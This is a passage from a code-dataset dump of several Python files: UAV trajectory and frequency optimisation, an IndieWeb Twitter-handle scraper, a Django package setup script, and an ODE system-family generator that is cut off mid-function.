self.gt[k], self.h_min)**2\n self.I[k][n] += self.gamma * self.a[j][n]**2 / self.d[j][k][n]\n self.I[k][n] -= self.gamma * self.a[k][n]**2 / self.d[k][k][n]\n\n #update R by eq 4 using shen_rpq\n rate_new = utils.calc_rates(self.a, self.q, self.f, self.d, self.I, self.gt, self.gamma)\n rate_new = np.multiply(rate_new, self.B)\n rate_total = np.sum(rate_new)\n\n #print(\"[sca] R: %.2f opt: %.2f\" % (rate_new, obj_val))\n \n #visualize and print\n self.plotter.plot_traj(self.q, self.gt)\n\n #termination condition\n if (rate_total - self.rate) / (self.rate) < eps:\n #self.rate = rate_new\n #print(\"[sca] R: %f opt: %f\" % (self.rate, obj_val))\n break\n\n #update iteration\n self.rate = rate_total\n\n itr += 1\n if itr % 5 == 0:\n pass\n \n print(\"[sca] time: %.2f\" % (time.time() - t_start))\n for k in range(K):\n print(\"[sca] uav: %d p: %.4f q: [%.2f %.2f]\" % (k, self.p[k][M-1], self.q[k][M-1][0], self.q[k][M-1][1]))\n print(\"[sca] R: %f --------------------\" % (rate_total))\n #print()\n\n #update freq graph based on trajectory endpoints\n self.update_graph(self.q[:,M - 1,:])\n f_new = self.color_graph(self.F)\n if self.f == f_new:\n print(\"[sca] finished\")\n print(\"[sca] R: %f\" % (self.rate))\n break\n self.f = f_new\n \n #update d, I\n for f in self.f:\n uav_idxs = self.f[f]\n\n for n in range(M):\n for k in uav_idxs:\n self.a[k][n] = abs(math.sqrt(self.p[k][n]))\n\n self.I[k][n] = 0\n for j in uav_idxs:\n self.d[j][k][n] = utils.dist2(self.q[j][n], self.gt[k], self.h_min)**2\n self.I[k][n] += self.gamma * self.a[j][n]**2 / self.d[j][k][n]\n self.I[k][n] -= self.gamma * self.a[k][n]**2 / self.d[k][k][n]\n\n #print ending diagnostics\n rate_final = utils.calc_rates(self.a, self.q, self.f, self.d, self.I, self.gt, self.gamma)\n rate_final = np.multiply(rate_final, self.B)\n rate_total_final = np.sum(rate_final)\n print(\"[sca] R FINAL: %f --------------------\" % (rate_total_final)) \n\n if not os.path.exists(\"data/%s%s\" % (self.time_str, self.params_str)):\n os.makedirs(\"data/%s%s\" % (self.time_str, self.params_str))\n\n print(\"[sca] writing output to data/%s%s/\" % (self.time_str, self.params_str))\n\n print(\"[sca] writing GT FINAL:\")\n with open(\"data/%s%s/gt.txt\" % (self.time_str, self.params_str), 'w+') as file:\n file.write(\"x y\\n\")\n for k in range(K):\n file.write(\"%.2f %.2f\\n\" % (self.gt[k][0], self.gt[k][1]))\n\n for k in range(K):\n print(\"[sca] writing P final:\")\n with open(\"data/%s%s/uav%d_p.txt\" % (self.time_str, self.params_str, k), 'w+') as file:\n file.write(\"t p\\n\")\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, 10 * math.log(self.p[k][n], 10)))\n\n \n for k in range(K):\n print(\"[sca] writing Q FINAL:\")\n with open(\"data/%s%s/uav%d_q.txt\" % (self.time_str, self.params_str, k), 'w+') as file:\n file.write(\"x y\\n\")\n freq = -1\n for f in self.f:\n if k in self.f[f]:\n freq = f\n \n for n in range(M):\n file.write(\"%.2f %.2f %f\\n\" % (self.q[k][n][0], self.q[k][n][1], freq))\n\n with open(\"data/%s%s/r_total.txt\" % (self.time_str, self.params_str), 'w+') as file:\n file.write(\"t r\\n\")\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, np.sum(rate_final, axis=0)[n] / 10**6))\n\n for k in range(K):\n print(\"[sca] writing R FINAL:\")\n with open(\"data/%s%s/uav%d_r.txt\" % (self.time_str, self.params_str, k), 'w+') as file:\n file.write(\"t r\\n\")\n\n for n in range(M):\n file.write(\"%d %.2f\\n\" % (n, rate_final[k][n] / 10**6))\n\n #for f in self.f:\n # pass\n\n self.p = np.multiply(self.a, self.a)\n time.sleep(10)\n return self.p, self.q\n\n #update graph given new set of target positions\n def update_graph(self, target_pos):\n #print(\"update_graph: \\n\", target_pos)\n t_start = time.time()\n\n self.g_gt.clear()\n\n for i in range(len(target_pos)):\n self.g_gt.add_node(i, p=target_pos[i])\n \n for v1 in self.g_gt:\n pos1 = self.g_gt.nodes[v1]['p']\n for v2 in self.g_gt:\n pos2 = self.g_gt.nodes[v2]['p']\n \n if v1 == v2 or self.g_gt.has_edge(v1, v2):\n continue\n \n #nodes are close enough that they should be assigned sep freqs if possible\n if utils.dist(pos1, pos2) <= self.max_color_dist:\n self.g_gt.add_edge(v1, v2, weight=utils.dist(pos1, pos2))\n \n t_end = time.time()\n #print(\"[upd graph] time:\", t_end - t_start)\n\n def color_graph(self, F):\n\n t_start = time.time()\n\n F = list(sorted(F, reverse=True))\n #print(\"[color] freqs:\", F)\n\n range_factor = 20000.0\n\n #freq assignments f\n f = [0]\n\n while 0 in f:\n #reinit everything\n g = self.g_gt.copy()\n max_vert_idx = len(g.nodes())\n\n g_freqs = []\n\n #print(\"[color] range factor:\", range_factor)\n\n f = [0 for i in range(g.number_of_nodes())]\n\n #starting from highest freq, max freq reuse\n for curr_freq in F:\n #determine max dist threshold for current freq\n dist_thresh = range_factor / curr_freq**2\n\n #fetch full graph state\n edges = g.edges(data=\"weight\")\n edges = list(sorted(edges, key=lambda x: x[2]))\n #edges = list(sorted(edges, reverse=True, key=lambda x: x[2]))\n verts = g.nodes()\n\n #print(edges)\n #print(verts)\n\n '''\n #remove edges with larger weight than threshold\n while edge_ptr < len(edges) and edges[edge_ptr][2] > dist_thresh:\n g.remove_edge(edges[edge_ptr][0], edges[edge_ptr][1])\n edge_ptr += 1\n '''\n\n #create a copy of graph for use on this freq\n g_freq = g.copy()\n\n #remove edges for other freqs\n for edge in edges:\n if edge[2] > dist_thresh:\n g_freq.remove_edge(edge[0], edge[1])\n g_freqs.append(g_freq)\n\n #find connected components in graph\n visited = [0 for x in range(max_vert_idx)]\n cc_id = []\n curr_id = 0\n\n #print(verts)\n\n for v in verts:\n #if not g.has_node(v):\n # continue\n\n #if previously unvisited, recursively visit\n num_visited = visit_node(g_freq, v, visited, cc_id, curr_id)\n\n if num_visited > 0:\n curr_id += 1\n \n #print(cc_id)\n #for each cc, assign vert with lowest degree the current freq\n for cc in cc_id:\n g_sub = g_freq.copy()\n\n while len(cc) > 0:\n lowest_degree = 1000\n lowest_vertex = -1\n for v in cc:\n if g_sub.degree(v) < lowest_degree:\n lowest_degree = g_sub.degree(v)\n lowest_vertex = v\n\n if lowest_vertex != -1:\n f[lowest_vertex] = curr_freq\n\n #remove the vertex's neighbors from consideration for this freq\n neighbors = list(g_sub.adj[lowest_vertex])\n for neighbor in neighbors:\n g_sub.remove_node(neighbor)\n cc.remove(neighbor)\n\n #remove the vertex and its edges from consideration completely\n g_sub.remove_node(lowest_vertex)\n g.remove_node(lowest_vertex)\n cc.remove(lowest_vertex)\n\n #print(g.nodes())\n\n \n #change range factor\n range_factor *= 0.95\n\n #print(f)\n t_end = time.time()\n \n freq_assignment_dict = {}\n for freq in F:\n freq_assignment_dict[freq] = []\n\n #proposed\n for i, freq in enumerate(f):\n freq_assignment_dict[freq].append(i)\n\n #FDMA\n #for i, freq in enumerate(F):\n # freq_assignment_dict[freq].append(i)\n\n #print(\"[color] time:\", t_end - t_start)\n print(\"[color] range_fac:\", range_factor)\n print(\"[color] assign:\", freq_assignment_dict)\n\n self.plotter.plot_graph(g_freqs[0], self.gt, f)\n return freq_assignment_dict\n\n #assign all vehicles to a single freq\n def naive_freq(self, freq):\n freq_assignments = {}\n uav_idxs = list(range(len(self.g_gt.nodes())))\n freq_assignments[freq] = uav_idxs\n return freq_assignments\n\n\n#apply curr_id to all nodes in connected component \ndef visit_node(g, i, visited, cc_id, curr_id):\n num_visited = 0\n\n if visited[i] != 1:\n visited[i] = 1\n if curr_id >= len(cc_id):\n cc_id.append([i])\n else:\n cc_id[curr_id].append(i)\n\n num_visited += 1\n\n #print(i)\n for v in g.adj[i]:\n num_visited += visit_node(g, v, visited, cc_id, curr_id)\n\n return num_visited\n\ndef slice_freq(idxs, a, q, p, d, I, gt):\n \n #print(idxs)\n idxs = np.array(idxs)\n\n a_f = a[idxs]\n q_f = q[idxs]\n p_f = p[idxs]\n I_f = I[idxs]\n gt_f = gt[idxs]\n\n d_f = d[idxs[:, None], idxs]\n #print(d_f.shape)\n\n return a_f, q_f, p_f, d_f, I_f, gt_f\n\ndef shen_sca(e, K, M, GT):\n\n p = np.zeros((K, M))\n q = np.zeros((K, M, 2))\n a = np.zeros((K, M))\n d = np.zeros((K, K, M))\n I = np.zeros((K, M))\n gt = GT\n gamma = 0.01\n eps = 0.01 #itr tolerance\n\n #drone trajectory init\n for i in range(K):\n q[i][0][0] = random.uniform(e.p_bounds[0][0], e.p_bounds[0][1])\n q[i][0][1] = random.uniform(e.p_bounds[1][0], e.p_bounds[1][1])\n\n x_step = (e.gt[i][0] - q[i][0][0]) / M\n y_step = (e.gt[i][1] - q[i][0][1]) / M\n for n in range(M):\n q[i][n][0] = q[i][0][0] + x_step * n\n q[i][n][1] = q[i][0][1] + y_step * n\n \n #drone power init\n for n in range(M):\n for k in range(K):\n p[k][n] = 1\n\n print('[shen] init SCA: k: %d m: %d gt: %s' % (K, M, GT))\n \n #init trajectory q and power p foor all k and n\n #store 2 sets of q and p for previous and current iteration\n #TODO\n\n #determine initial R given p and q\n for n in range(M):\n for k in range(K):\n a[k][n] = math.sqrt(p[k][n])\n\n I[k][n] = 0\n for j in range(K):\n d[j][k][n] = utils.dist(q[j][n], gt[k])**2\n I[k][n] += gamma * a[j][n]**2 / d[j][k][n]\n I[k][n] -= gamma * a[k][n]**2 / d[k][k][n]\n shen_r = utils.shen_rpq(a, q, d, I, gt, gamma)\n print(\"[shen] R: %.2f\" % (shen_r))\n\n #visualize and print\n e.plot_traj(q, gt)\n for k in range(K):\n for n in range(M):\n if n % 5 == 0:\n print(\"[shen] q:[%.2f %.2f] a:%.2f\" % (q[k][n][0], q[k][n][1], a[k][n]))\n print()\n\n itr = 0\n while True:\n var_a, var_q = optimize_shen(a, q, p, d, I, gt, gamma)\n \n #update a, q, p\n for idx in range(K * M):\n a[idx // M][idx % M] = var_a.level()[idx]\n p[idx // M][idx % M] = a[idx // M][idx % M]**2\n\n q[idx // M][idx % M][0] = var_q.level()[idx * 2]\n q[idx // M][idx % M][1] = var_q.level()[idx * 2 + 1]\n \n #update a, d, I with p, q\n for n in range(M):\n for k in range(K):\n a[k][n] = math.sqrt(p[k][n])\n \n I[k][n] = 0\n for j in range(K):\n d[j][k][n] = utils.dist(q[j][n], gt[k])**2\n I[k][n] += gamma * a[j][n]**2 / d[j][k][n]\n I[k][n] -= gamma * a[k][n]**2 / d[k][k][n]\n\n #update R by eq 4 using shen_rpq\n shen_r_new = utils.shen_rpq(a, q, d, I, gt, gamma)\n print(\"[shen] R: %.2f\" % (shen_r_new))\n \n #visualize and print\n e.plot_traj(q, gt)\n for k in range(K):\n for n in range(M):\n if n % 5 == 0:\n print(\"[shen] q:[%.2f %.2f] a:%.2f\" % (q[k][n][0], q[k][n][1], a[k][n]))\n print()\n\n #continue if prev r was 0\n if shen_r <= 0: \n shen_r = shen_r_new\n continue\n\n #termination condition\n '''\n if ((shen_r_new - shen_r) / (shen_r)) < eps:\n print(\"term\")\n time.sleep(30)\n break\n '''\n\n #update iteration\n shen_r = shen_r_new\n\n itr += 1\n if itr % 5 == 0:\n pass\n\n p = np.multiply(a, a)\n return p, q\n\ndef optimize_shen(a, q, p, d, I, gt, gamma, v_max=0.2, h_min=0.2):\n d_min = 0.0\n\n K, M = a.shape\n\n #print(K,M)\n #update a, q by solving complex problem 23\n m = mf.Model('shen_sca')\n var_a = m.variable('a', [K, M], mf.Domain.inRange(0.1, 31.6))\n var_q = m.variable('q', [K, M, 2], mf.Domain.inRange(-500, 500))\n var_dist = m.variable('dist_expr', [K, K, M], mf.Domain.greaterThan(0.0))\n var_inner = m.variable('inner_div', [K, K, M])\n var_t = m.variable('t', [K, M, K])\n\n #fixed starting loc\n for k in range(K):\n m.constraint(mf.Expr.sub(var_q.index(k, 0, 0), q[k][0][0]), mf.Domain.equalsTo(0.0))\n m.constraint(mf.Expr.sub(var_q.index(k, 0, 1), q[k][0][1]), mf.Domain.equalsTo(0.0))\n \n #define expression for 20c in Shen 2020\n inner_1 = np.empty((K, M), dtype=object)\n inner_2 = np.empty((K, K, M), dtype=object)\n\n #for each n, k, create R_k(a[n],q[n],a_r[n],q_r[n]) and add the expressions together for objective\n obj_expr = mf.Expr.constTerm(0)\n for n in range(M):\n for k in range(K):\n\n inner_1[k][n] = mf.Expr.zeros(1)\n t_1_idx = 0\n for j in range(K): \n\n #t[0] computations\n #var_dist >= sqrt(x_dist^2 + y_dist^2 +z_dist^2)\n m.constraint('dist_%d_%d_%d' % (j, k, n), mf.Expr.vstack([\n mf.Expr.constTerm(0.5), \n var_dist.index(j, k, n), \n mf.Expr.sub(var_q.index(j, n, 0), gt[k][0]), \n mf.Expr.sub(var_q.index(j, n, 1), gt[k][1]),\n mf.Expr.constTerm(h_min)]), mf.Domain.inRotatedQCone())\n\n #inner_1[k][n] = mf.Expr.add(inner_1[k][n], mf.Expr.mul(-1.0 * gamma * p[j][n] / d[j][k][n]**2, var_dist.index(j, k, n)))\n inner_1[k][n] = mf.Expr.add(inner_1[k][n], mf.Expr.sub(mf.Expr.mul(2 * a[j][n] / d[j][k][n], var_a.index(j, n)), mf.Expr.mul(a[j][n]**2 / d[j][k][n]**2, var_dist.index(j, k, n))))\n\n #t[1] computations\n if j != k:\n dist_temp = np.zeros((3))\n dist_temp[0] = q[j][n][0] - gt[k][0]\n dist_temp[1] = q[j][n][1] - gt[k][1]\n dist_temp[2] = h_min\n inner_2[j][k][n] = mf.Expr.add(d[j][k][n], mf.Expr.dot(2 * (dist_temp), mf.Expr.hstack([mf.Expr.sub(var_q.index(j, n, 0), q[j][n][0]), mf.Expr.sub(var_q.index(j, n, 1), q[j][n][1]), mf.Expr.constTerm(0)])))\n m.constraint('inner_%d_%d_%d' % (j, k, n), mf.Expr.vstack([mf.Expr.mul(0.5, var_inner.index(j, k, n)), inner_2[j][k][n], var_a.index(j, n)]), mf.Domain.inRotatedQCone())\n\n #t[1+j] >= gamma / (1 + I[k][n]) * inner_2[k][n]\n m.constraint('t1_%d_%d_%d' % (j, k, n), mf.Expr.sub(var_t.index(k, n, 1 + t_1_idx), mf.Expr.mul(gamma / (1 + I[k][n]), var_inner.index(j, k, n))), mf.Domain.greaterThan(0.0))\n t_1_idx += 1\n\n '''\n #t[2] >= -log(1 + I[k][n])\n m.constraint('t2_%d_%d_%d' % (j, k, n), mf.Expr.hstack(mf.Expr.constTerm(1 + I[k][n]), 1, var_t.index(k, n, 2)), mf.Domain.inPExpCone())\n \n #t[3] >= I[k][n] / (1 + I[k][n])\n m.constraint('t3_%d_%d_%d' % (j, k, n), mf.Expr.sub(var_t.index(k, n, 3), mf.Expr.constTerm(I[k][n] / (1 + I[k][n]))), mf.Domain.greaterThan(0.0))\n '''\n \n '''\n #min sep constraint\n if j > k:\n dist_jk = q[k][n] - q[j][n]\n dist_jk = np.abs(dist_jk)\n #print(j, k, n, dist_jk)\n #print(mf.Expr.dot(dist_jk, mf.Expr.vstack([mf.Expr.sub(var_q.index(k, n, 0), var_q.index(j, n, 0)), mf.Expr.sub(var_q.index(k, n, 1), var_q.index(j, n, 1))])))\n #print(dist_jk)\n m.constraint('min_sep_%d_%d_%d' % (j, k, n), mf.Expr.vstack([\n mf.Expr.constTerm(1), \n mf.Expr.add(mf.Expr.mul(dist_jk[0], var_q.index(k, n, 0)))\n #mf.Expr.dot(dist_jk, mf.Expr.vstack([mf.Expr.sub(var_q.index(k, n, 0), var_q.index(j, n, 0)), mf.Expr.sub(var_q.index(k, n, 1), var_q.index(j, n, 1))])), \n mf.Expr.constTerm(q[k][n][0] - q[j][n][0]), \n mf.Expr.constTerm(q[k][n][1] - q[j][n][1]), \n mf.Expr.constTerm(d_min)]), \n mf.Domain.inRotatedQCone())\n '''\n\n #t[0] <= log(1 + gamma * inner_1)\n #inner_1[k][n] = mf.Expr.sub(mf.Expr.mul(2 * a[k][n] / d[k][k][n], var_a.index(k, n)), mf.Expr.mul(a[k][n]**2 / d[k][k][n]**2, var_dist.index(k, k, n)))\n m.constraint('t0_%d_%d' % (k, n), mf.Expr.hstack(\n mf.Expr.add(1, mf.Expr.mul(gamma, inner_1[k][n])), \n 1, \n var_t.index(k, n, 0)), mf.Domain.inPExpCone())\n \n #flight speed constraint\n if n < M - 1:\n m.constraint('speed_%d_%d' % (k, n), mf.Expr.vstack([mf.Expr.constTerm(v_max), mf.Expr.sub(var_q.index(k, n + 1, 0), var_q.index(k, n, 0)), mf.Expr.sub(var_q.index(k, n + 1, 1), var_q.index(k, n, 1))]), mf.Domain.inQCone())\n \n obj_expr = mf.Expr.add(obj_expr, mf.Expr.dot(var_t.slice([k, n, 0], [k + 1, n + 1, K]), [0.693147] + [-1 for x in range(K - 1)]))\n\n m.objective('obj_rate', mf.ObjectiveSense.Maximize, obj_expr)\n m.setSolverParam(\"intpntCoTolRelGap\", 1.0e-5)\n #m.setSolverParam(\"intpntCoTolRelGap\", 1.0e-8)\n\n #m.setLogHandler(sys.stdout)\n #m.writeTask('shen_sca.opf')\n m.solve()\n\n #print(m.getProblemStatus())\n #print(\"[opt] %f\" % (m.primalObjValue()))\n #print(var_a.level(), var_q.level())\n return var_a, var_q, m.primalObjValue()\n\n","repo_name":"jmagine/multiuav-rf","sub_path":"sim/opt.py","file_name":"opt.py","file_ext":"py","file_size_in_byte":21996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"9738834947","text":"#!/usr/bin/env python3\nimport mf2py\nimport re\nimport requests\nimport logging\nfrom concurrent.futures import ThreadPoolExecutor\nimport json\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urljoin \n\ndef all_hcards(items):\n hcards = []\n for item in items:\n if isinstance(item, dict):\n if 'h-card' in item['type']:\n hcards.append(item)\n hcards += all_hcards(item.get('children', []))\n hcards += all_hcards(item.get('properties', {}).get('attendee', []))\n return hcards\n \n\ndef find_screen_name(url):\n try:\n print('fetching', url)\n r = requests.get(url, timeout=10)\n p = mf2py.parse(url=url)\n for me in p.get('rels', {}).get('me', []):\n m = re.match(r'https?://(?:www.)?twitter.com/@?([\\w]+)/?', me)\n if m:\n return m.group(1)\n except:\n logging.error('problem fetching %s', url)\n \n\nall_urls = []\n\nprint('fetching irc-people')\np = mf2py.parse(url='https://indiewebcamp.com/irc-people')\nfor hcard in all_hcards(p.get('items', [])):\n urls = hcard.get('properties', {}).get('url', [])\n if urls:\n all_urls.append(urls[0])\n\nprint('fetching guest lists')\nr = requests.get('https://indiewebcamp.com/Category:Guest_List')\nsoup = BeautifulSoup(r.text)\nguest_lists = []\nfor a in soup.find_all('a'):\n if 'Guest_List' in a.get('href', ''):\n guest_lists.append(urljoin('https://indiewebcamp.com/', a.get('href')))\n\nfor guest_list in sorted(set(guest_lists)):\n print('fetching', guest_list)\n p = mf2py.parse(url=guest_list)\n for hcard in all_hcards(p.get('items', [])):\n urls = hcard.get('properties', {}).get('url', [])\n if urls:\n all_urls.append(urls[0])\n\nwith open('domains.json', 'w') as f:\n json.dump(sorted(set(filter(None, all_urls))), f, indent=True)\n\nwith ThreadPoolExecutor(max_workers=25) as executor:\n screen_names = executor.map(find_screen_name, sorted(set(filter(None, all_urls))))\n\nwith open('names.json', 'w') as f:\n json.dump(list(set(filter(None, screen_names))), f, indent=True)\n","repo_name":"kylewm/indieweb-irc-people-twitter-list","sub_path":"fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"}
+{"seq_id":"37337366079","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom os.path import join, dirname, abspath\nimport sys\n\nPY2 = sys.version_info[0] == 2\nROOT = dirname(abspath(__file__))\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup # NOQA\n\n\ndef read_relative_file(filename):\n \"\"\"\n Returns contents of the given file, whose path is supposed relative\n to this module.\n\n \"\"\"\n with open(join(ROOT, filename)) as f:\n return f.read()\n\n\nNAME = 'django-pimpmytheme'\nDESCRIPTION = (\"Customise theme (css and template) on a per user/client \"\n \"whatever basis\")\nREQUIREMENTS = [\n 'Django>=1.11,<2.0' if PY2 else 'Django>=1.11',\n 'django-compressor>=2.2',\n 'gitpython>1.0.0',\n]\n__VERSION__ = read_relative_file('VERSION').strip()\n\n\nparams = dict(\n name=NAME,\n description=DESCRIPTION,\n packages=['pimpmytheme'],\n version=__VERSION__,\n long_description=read_relative_file('README.rst'),\n author='Yohann Gabory',\n author_email='peopledoc@people-doc.com',\n url='https://github.com/peopledoc/django-pimpmytheme',\n license='MIT License',\n include_package_data=True,\n install_requires=REQUIREMENTS,\n zip_safe=False,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Framework :: Django',\n 'Framework :: Django :: 1.11',\n 'Framework :: Django :: 2.0',\n ],\n)\n\nif __name__ == '__main__':\n setup(**params)\n","repo_name":"peopledoc/django-pimpmytheme","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1811,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"71"}
+{"seq_id":"69986474471","text":"import os\r\nimport torch\r\nimport pickle\r\nimport random\r\nimport itertools\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom tqdm import tqdm\r\nfrom .ode_classes import *\r\nfrom twa.utils.utils import ensure_device, ensure_dir\r\nfrom sklearn.model_selection import train_test_split\r\n\r\n\r\nimport torch.optim as optim\r\nimport torch.nn.functional as F\r\nimport torch.nn.init as init\r\nfrom torch import nn\r\nfrom torch import distributions\r\nfrom torch.distributions import MultivariateNormal, Uniform, TransformedDistribution, SigmoidTransform\r\nfrom torch.nn.parameter import Parameter\r\n\r\nfrom .augmentations import augment_normalizing_flow\r\nfrom .ode import FlowSystemODE\r\n\r\n\r\n\r\n\r\n\r\nclass SystemFamily():\r\n \"\"\"\r\n Family of ODE or PDE systems\r\n \"\"\"\r\n\r\n @staticmethod\r\n def get_generator(data_name):\r\n \"\"\"\r\n Selecting supported ODE or PDE generator\r\n \"\"\"\r\n if data_name == 'simple_oscillator' or data_name == 'so':\r\n generator = SimpleOscillator\r\n\r\n elif data_name == 'selkov':\r\n generator = Selkov\r\n\r\n elif data_name == 'suphopf':\r\n generator = SupercriticalHopf\r\n\r\n elif data_name == 'subhopf':\r\n generator = SubcriticalHopf\r\n\r\n elif data_name == 'bzreaction' or data_name == 'bz':\r\n generator = BZreaction\r\n\r\n elif data_name == 'vanderpol' or data_name == 'vp':\r\n generator = VanDerPol\r\n\r\n elif data_name == 'lienard_poly':\r\n generator = LienardPoly\r\n \r\n elif data_name == 'lienard_sigmoid':\r\n generator = LienardSigmoid\r\n\r\n elif data_name == 'repressilator':\r\n generator = Repressilator\r\n else:\r\n raise ValueError(f'Unknown data, `{data_name}`! Try `simple_oscillator`.')\r\n\r\n return generator\r\n\r\n\r\n @staticmethod\r\n def get_sampler(sampler_type):\r\n \"\"\"\r\n Selecting supported sampler\r\n \"\"\"\r\n if (sampler_type == 'uniform') or (sampler_type == 'random'):\r\n sampler = SystemFamily.params_random\r\n elif sampler_type == 'extreme':\r\n sampler = SystemFamily.params_extreme\r\n elif sampler_type == 'sparse':\r\n sampler = SystemFamily.params_sparse\r\n elif sampler_type == 'control':\r\n sampler = SystemFamily.params_control\r\n elif sampler_type == 'constant':\r\n sampler = SystemFamily.params_constant\r\n else:\r\n print(sampler_type)\r\n raise ValueError('Param sampler not recognized.')\r\n\r\n return sampler\r\n\r\n\r\n\r\n def __init__(self, data_name, device=None, #min_dims=None, max_dims=None, num_lattice=None, labels=None, \r\n param_ranges=None, param_groups=None, seed=0, **kwargs):\r\n \"\"\"\r\n Generate a system family\r\n :param data_name: name of system\r\n :param param_ranges: range for each param in model, \r\n :param device: device to use\r\n :param min_dims: minimum range of dimensions to use\r\n :param max_dims: maximum range of dimensions to use\r\n :param kwargs: any arguments of a general system\r\n \"\"\"\r\n\r\n # torch.manual_seed(seed)\r\n # np.random.seed(seed)\r\n # random.seed(seed)\r\n\r\n self.data_name = data_name\r\n self.pde = False\r\n \r\n DE = SystemFamily.get_generator(self.data_name)\r\n # self.data_dir = os.path.abspath(data_dir) if data_dir is not None else '.'\r\n\r\n # if not provided, use ode suggested params\r\n self.param_ranges = DE.recommended_param_ranges if param_ranges is None else param_ranges\r\n self.param_groups = DE.recommended_param_groups if param_groups is None else param_groups\r\n # self.labels = DE.labels if labels is None else labels\r\n # self.min_dims = DE.min_dims if min_dims is None else min_dims\r\n # self.max_dims = DE.max_dims if max_dims is None else max_dims\r\n param_use_ode_defaults = ['min_dims', 'max_dims', 'labels', 'num_lattice']\r\n for p in param_use_ode_defaults:\r\n if p in kwargs.keys() and kwargs[p] is None:\r\n kwargs.pop(p)\r\n # general DE params\r\n self.device = ensure_device(device)\r\n params = self.params_random(1)\r\n DE_ex = DE(params=params[0], device=device, **kwargs)\r\n \r\n \r\n data_info = DE_ex.get_info()\r\n # data_info = {**self.__dict__, **data_info} # merge dictionaries\r\n self.data_info = data_info\r\n # self.num_lattice = num_lattice\r\n self.dim = DE_ex.dim\r\n self.DE = DE\r\n self.DE_ex = DE_ex\r\n if self.data_name != 'grayscott': # TODO: ask isinstance(generator, ODE/PDE)\r\n # TODO: can generator.param can be used as default?\r\n self.coords = self.DE_ex.generate_mesh() # min_dims, max_dims, num_lattice\r\n self.coords = self.coords.to(device).float()\r\n\r\n self.kwargs = kwargs\r\n\r\n # self.param_sampler = SystemFamily.get_sampler(sampler_type)\r\n\r\n def get_sf_info(self):\r\n sf_info = self.data_info.copy()\r\n sf_info['param_ranges'] = self.param_ranges\r\n sf_info['data_name'] = self.data_name\r\n return sf_info\r\n\r\n######################################## Param sampling methods ########################################################\r\n\r\n def params_random(self, num_samples):\r\n \"\"\"\r\n Return random sampling of params in range\r\n \"\"\"\r\n params = np.zeros((num_samples, len(self.param_ranges)))\r\n \r\n for i,p in enumerate(self.param_ranges):\r\n params[:, i] = np.random.uniform(low=p[0], high=p[1], size=num_samples)\r\n return params\r\n \r\n def params_constant(self, num_samples, fill_value=None):\r\n \"\"\"\r\n Return constant params\r\n \"\"\"\r\n param_values = [np.quantile([-1,1], 0.6) for p in self.param_ranges] if fill_value is None else fill_value\r\n params = np.repeat([param_values], num_samples, axis=0)\r\n \r\n return params\r\n\r\n def params_extreme(self, num_samples=None):\r\n \"\"\"\r\n Return array of extreme (minimal, and maximal bounds) param combinations\r\n \"\"\"\r\n # param_bounds = [torch.tensor([mn, mx]) for (mn, mx) in self.param_ranges]\r\n # mesh = torch.meshgrid(*param_bounds)\r\n # params = torch.cat([ms[..., None] for ms in mesh], dim=-1)\r\n\r\n nparams = len(self.param_ranges)\r\n lst = list(itertools.product([0, 1], repeat=nparams))\r\n params = np.zeros((len(lst), len(self.param_ranges)))\r\n for i, p in enumerate(lst):\r\n params[i] = [self.param_ranges[j][p[j]] for j in range(nparams)]\r\n\r\n return params\r\n\r\n def params_sparse(self, num_samples, p=0.5):\r\n \"\"\"\r\n Samples which parameters to set with Binomial distribution with probability p and then \r\n randomly assigns them (for families of many parameters)\r\n \"\"\"\r\n which_params = np.random.binomial(1, p, (num_samples, len(self.param_ranges)))\r\n params = self.params_random(num_samples)\r\n return (params * which_params)\r\n\r\n def params_control_single(self, max_coeff=3., prop_zero=.6, prop_non_unit=.3):\r\n\r\n # proportion of unit parameters\r\n prop_unit = 1 - prop_zero - prop_non_unit\r\n\r\n # Initialize parameter vector\r\n num_terms = int(len(self.param_ranges) / self.dim)\r\n x = (2*max_coeff) * torch.rand(num_terms, self.dim)\r\n\r\n # zero out `prop_zero` parameters\r\n coeffs = torch.where(x/(2*max_coeff) < prop_zero, torch.zeros_like(x), x)\r\n\r\n # Add 1 coeffs\r\n coeffs = torch.where((x/(2*max_coeff) >= prop_zero)*(x/(2*max_coeff)< (prop_zero + prop_unit/2)), torch.ones_like(coeffs), coeffs)\r\n\r\n # Add -1 coeffs\r\n coeffs = torch.where((x/(2*max_coeff) >=prop_zero + prop_unit/2)*(x/(2*max_coeff) < (prop_zero + prop_unit)), -1*torch.ones_like(coeffs), coeffs)\r\n\r\n # Add random coeffs\r\n coeffs = torch.where(x/(2*max_coeff)>prop_zero + prop_unit, (2*max_coeff) * torch.rand(num_terms, self.dim) - max_coeff, coeffs)\r\n\r\n # Are both equations identically 0?\r\n one_zero_eq = (coeffs.sum(0)[0] * coeffs.sum(0)[1] == 0)\r\n if one_zero_eq:\r\n # Make some parameters randomly +/- 1\r\n for i in range(self.dim):\r\n ind = np.random.randint(num_terms)\r\n sgn = 2 * torch.rand(1) - 1\r\n sgn /= sgn.abs()\r\n coeffs[ind,i] = sgn * 1.\r\n return coeffs.reshape(-1).numpy() #.unsqueeze(0).numpy()\r\n\r\n def params_control(self, num_samples, **kwargs): #TODO: TEMP\r\n \"\"\"\r\n Return array of control parameters (all parameters are zero except one)\r\n \"\"\"\r\n params = np.zeros((num_samples, len(self.param_ranges)))\r\n for i in range(num_samples):\r\n params[i] = self.params_control_single(**kwargs)\r\n return params\r\n \r\n######################################## Flow noise functions ########################################################\r\n\r\n def noise_vectors_gaussian(self, vectors, noise_level):\r\n 